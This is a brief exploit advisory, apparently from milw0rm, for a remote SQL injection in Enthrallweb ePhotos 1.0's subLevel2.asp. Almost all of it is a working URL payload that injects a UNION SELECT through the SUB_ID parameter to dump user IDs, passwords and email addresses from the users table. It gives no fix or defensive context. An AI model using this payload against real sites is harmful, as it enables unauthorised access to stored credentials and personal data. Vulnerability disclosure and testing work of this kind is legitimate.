******************************************************************************* # Title : Enthrallweb ePhotos 1.0 (subLevel2.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.enthrallweb.us # $$ : 179.40 USD ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//subLevel2.asp?Cat_ID=33&SUB_ID=[SQL] Example: //subLevel2.asp?Cat_ID=33&SUB_ID=-1%20union%20select%20U_ID,U_PASSWORD,0,0,0,U_email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2006-12-23]